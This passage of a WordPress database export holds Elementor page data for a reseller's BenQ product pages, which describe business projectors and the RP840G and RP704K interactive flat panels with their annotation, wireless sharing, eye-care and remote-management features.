via USB and you\\u2019re all set to deliver compelling IFP touch-enhanced lessons.<\\/p><p><strong>Parental Control<\\/strong> <br \\/>BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c06c26c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdee68c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c5aa819\",\"elType\":\"widget\",\"settings\":{\"title\":\"Display Management Support\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5fcf286\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fcf021\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"137f9bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Multiple Display Administrator (MDA)<\\/strong><\\/p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on\\/off times, which helps to create hassle-free maintenance.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61de455\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5d041e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-05.jpg\",\"id\":2829}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85858fd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"630131a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c81a461\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-06.jpg\",\"id\":2830}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d09571\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7562601\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EasySetting<\\/strong><\\/p><p>Install Android\\u2122 apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65cdaaa\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b1c982\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ce849b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Over-the-Air Update (OTA)<\\/strong><\\/p><p>Upgrade your displays with the latest BenQ firmware via BenQ\\u2019s OTA update support to keep them running smoothly at all times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5ce7f62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3400375\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-07.jpg\",\"id\":2831}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa35854\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"83a22ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ef462ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c554c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5178,2885,'_edit_lock','1551686122:1'),(5179,2885,'_edit_last','1'),(4978,2844,'_elementor_version','0.4'),(4977,2844,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4975,2844,'_elementor_template_type','post'),(4976,2844,'_wp_page_template','default'),(4947,2834,'_hide_page_title',''),(4948,2834,'_hide_header',''),(4949,2834,'_hide_footer',''),(4950,2834,'_hide_breadcrumb',''),(4951,2834,'_cover',''),(4952,2834,'_show_excerpt',''),(4953,2834,'_wc_apply_product',''),(4954,2834,'_yoast_wpseo_content_score','30'),(5180,2885,'_wp_page_template','template-fullwidth.php'),(4955,2841,'_elementor_edit_mode','builder'),(4956,2841,'_elementor_template_type','post'),(4957,2841,'_wp_page_template','template-fullwidth.php'),(4958,2841,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4959,2841,'_elementor_version','0.4'),(5001,1445,'_oembed_time_68e17de406f34eeab7014b6d9dccbe6f','1549522307'),(4961,2842,'_wp_page_template','template-fullwidth.php'),(4962,2842,'_elementor_edit_mode','builder'),(4963,2842,'_elementor_template_type','post'),(4964,2842,'_elementor_data','[{\"id\":\"3e162d3a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"638893da\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6f668790\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"926e9aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dc7a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df626b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70\\u2019\\u2019\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"86ad24f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd94d77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f09a6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K UHD 70\\u2019\\u2019 Education Interactive Flat Panel Display | RP704K<\\/h4><p><strong>Your Caring Mate for Enhanced Interactive Learning<\\/strong><\\/p><p><br \\/>The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45957e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"776c1c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/Board-Management-1.png\",\"id\":2817}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"022d2bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1dc7d9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2005776\",\"elType\":\"widget\",\"settings\":{\"title\":\"Create a Healthy Learning Environment for Students\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c85d973\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0e86a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"879bd0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/edu-rp750k-21-1.png\",\"id\":2818}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e6f5604\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf641a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Germ-Resistant Screen<\\/strong><br \\/>The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silver\\u2019s antimicrobial feature remains effective even after thorough cleaning or long periods of use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"170aa2a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8471643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f2141cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>* TUV Test Confirmed<\\/strong><br \\/>TUV is the world\\u2019s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUV\\u2019s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screen\\u2019s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQ\\u2019s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88d63dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9a92e2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f23907c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Smart Eye-Care Solution<\\/strong><\\/p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br \\/>*For Android devices, BenQ\\u2019s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f69235\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fa63930\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8a45b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>T\\u00dcV-Certified Low Blue Light Technology<\\/strong><\\/p><p><span style=\\\"font-size: 0.875rem;\\\">Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQ\\u2019s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cdbbd38\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9410e4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/low-bluelight.png\",\"id\":2819}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"678cc05\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"819463a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28220a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\",\"id\":2820}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ce9aeba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"91666dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anti-Glare Display<\\/strong><\\/p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704K\\u2019s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b52bca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdf6ddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"323737a\",\"elType\":\"widget\",\"settings\":{\"title\":\"EZWrite 4.1 : An Easy and Fun Annotation Solution\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d45294e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b36de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e1ec4b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Intelligent Handwriting Recognition<\\/strong><\\/p><p>The Smartboard RP704K\\u2019s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8dd3132\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36697a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-22.jpg\",\"id\":2822}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fa56a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0939589\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0acc085\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-01.jpg\",\"id\":2823}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"54da0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6ed8ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wireless Solution for Seamless Collaboration<\\/strong><\\/p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"07ba6b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"80e0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a6161d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>20-Point Multi-Touch Interactivity<\\/strong><\\/p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"200de74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d25d95e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-02.jpg\",\"id\":2824}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"900ab72\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3d86fe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"744c11b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Facilitate Teaching Flow with Friendly Design\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9fa4c57\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9912ac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ee788c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-08.png\",\"id\":2825}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ba4df64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Integrated Front-Facing Speaker and Pen Tray<\\/strong><\\/p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"776468e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e3a48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-09.png\",\"id\":2826}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e34662e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Account Management System for Personalized File Management<\\/strong><\\/p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f7a3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5caf9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d41625\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>NFC Pen<\\/strong><\\/p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2fd161\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fb3584\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-10.png\",\"id\":2827}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57d3c62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"751b521\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e35cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-04.jpg\",\"id\":2828}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"374a056\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec7b171\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Front Buttons<\\/strong> <br \\/>The front buttons, including Power, Home, Back, Setting, and Volume, 